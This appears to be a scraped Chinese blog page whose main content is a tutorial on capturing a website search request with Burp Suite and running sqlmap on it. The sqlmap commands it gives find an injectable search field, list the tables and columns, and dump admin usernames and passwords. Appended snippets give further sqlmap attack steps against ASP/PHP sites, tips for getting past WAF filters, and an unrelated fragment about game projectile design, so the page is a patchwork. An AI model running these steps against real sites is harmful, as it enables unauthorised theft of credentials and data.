burpsuit辅助sqlmap攻击

今天发现一个搜索型注入,主要是利用网站的搜索引擎来注入的

例如下图所示:

在这个搜索 地方,我们可以输入2个字符验证他们是否能注入;

输入:‘  出错

输入:% 不出错

满足以上2点,即可注入,我们要用到的工具为burpsuit,sqlmap

1:首先我们在搜索框里随便输入一个数字,我这里输入123,利用burpsuit把他抓包抓下来

2:然后把抓包抓下来的复制,然后粘贴到文本文档上去,保存到1.txt文件里

命令为:python sqlmap/sqlmap.py -r 1.txt

3:python sqlmap/sqlmap.py -r 1.txt  --tables   猜表名

4:python sqlmap/sqlmap.py -r 1.txt   --current-db  查看当前的数据库

5:python sqlmap/sqlmap.py -r 1.txt    -T admin --columns 猜列名

6:python sqlmap/sqlmap.py -r 1.txt    -D 指定数据库 -T admin -C admin,password --dump

综上,即可。

时间: 2024-10-06 23:25:16

burpsuit辅助sqlmap攻击的相关文章

Burpsuit安装sqlmap插件

1.首先我们要拥有python2的环境,sqlmap.py目前不支持python3 2.下载sqlmap的jar插件 3.设置对应的环境变量 4.看是否安装成功 5.打开burpsuit Extender > option >Java Environment >Select folder(安装java的lib地址,如下图) Extender > Extensions> Add > jar > Sqlmap.jar 问题: 我自己电脑里有pycharm,不知道为什么

sqlmap攻击ASP、PHP有注入点的网站

找到注入点 1.设置sqlmap -u 地址 --dbs --current-user, 2.设置sqlmap -u 地址 --tables猜解表名,或者--dbms mysql --tables 3.设置sqlmap -u 地址 -T uname(表名) --columns猜解列名 4.设置sqlmap -u 地址 -T uname(表名) -C login-name,pass,username(列名,用逗号分隔) --dump获取数据 5.获取登录账号和密码后,找到管理登录口,一般比较隐蔽,

使用Burpsuite辅助Sqlmap进行POST注入测试

原文地址:http://www.freebuf.com/tools/2311.html 我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况. 这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易. 1. 浏览器打开目标地址 http://testasp.vulnweb.com/Login.asp2. 配置burp代理(127.0.0.1:8080)以拦截请求3. 点击login表单的submit按

sqlmap 技巧整理

收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充.分享. TIP1 当我们注射的时候,判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤 http://s

Sqlmap注入技巧集锦

当我们注射的时候,判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤 http://site/script?id=10– # 失败 http://site/script?id=10;– #失败 http://sit

Sqlmap注入技巧收集整理

TIP1 当我们注射的时候,判断注入 http://site/script?id=10http://site/script?id=11-1 # 相当于 id=10http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤http://site/script?id=10– # 失败http://site/script?id=10;– #失败http://sit

sqlmap注入技巧收集

收集了一些利用Sqlmap做注入测试的TIPS,其中也包含一点绕WAF的技巧,便于大家集中查阅,欢迎接楼补充.分享. TIP1 当我们注射的时候,判断注入 http://site/script?id=10 http://site/script?id=11-1 # 相当于 id=10 http://site/script?id=(select 10) # 相当于 id=10 http://site/script?id=10 and 1=1 #失败 通过判断可发现and和or被过滤 http://s

sqlmap的一些小技巧

前言 很多人都使用sqlmap来进行SQL注入测试,但是很多人只是简简单单的current-user,current-db,-D,-T,--dump这样子来做,其实sqlmap还有很多很强大的功能,这里简单的总结下. POST注入 有两种方法来进行post注入,一种是使用--data参数,将post的key和value用类似GET方式来提交.二是使用-r参数,sqlmap读取用户抓到的POST请求包,来进行POST注入检测. 查看payload 之前一直是加本地代理,然后用burpsuit来看s

游戏中的弹道学手册(转)

[1]直线单体必中飞弹 代表单位:<帝国时代1>的弓箭手,<海岛奇兵>的步兵 直线飞行,只会击中被攻击的单位,命中率100%.看起来飞弹会穿过一些单位,但其实只会击中被锁定为攻击目标的单位.如果飞弹在飞行的过程中目标单位已经被摧毁,则飞弹会继续飞行一段距离之后消失. 虽然理论上来说弓箭手的弹道应该是抛物线,但<帝国时代1>中的弓箭手是直线射击的,我们就不要对老游戏太苛求啦! [2]直线单体真实碰撞飞弹 代表单位:<合金弹头>的小手cc枪.H枪,绝大多数射击游